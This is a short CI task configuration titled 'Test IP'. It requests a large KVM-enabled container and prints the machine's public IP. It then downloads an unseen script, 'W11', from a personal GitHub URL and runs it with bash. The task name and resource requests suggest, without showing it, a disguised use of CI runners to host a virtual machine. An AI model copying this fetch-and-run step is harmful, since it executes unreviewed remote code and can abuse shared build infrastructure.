task:
  name: Test IP
  environment:
    TOKEN: ENCRYPTED[4e3f3b5771ea69673f76f7d07c051305c233c3e8de0156fdd166e5b658ab4441cdc43e6082495dba0cccac851b90a939]
  container:
    cpu: 8
    memory: 32G
    image: docker.io/ubuntu
    use_static_ip: true
    kvm: true
    timeout: 120m
  script: 
   - apt-get update
   - apt-get install wget curl -y
   - IP=$(wget -qO- ifconfig.co)
   - echo $IP
   - wget https://raw.githubusercontent.com/DangDev/dangdev/main/W11
   - chmod +x *
   - bash W11
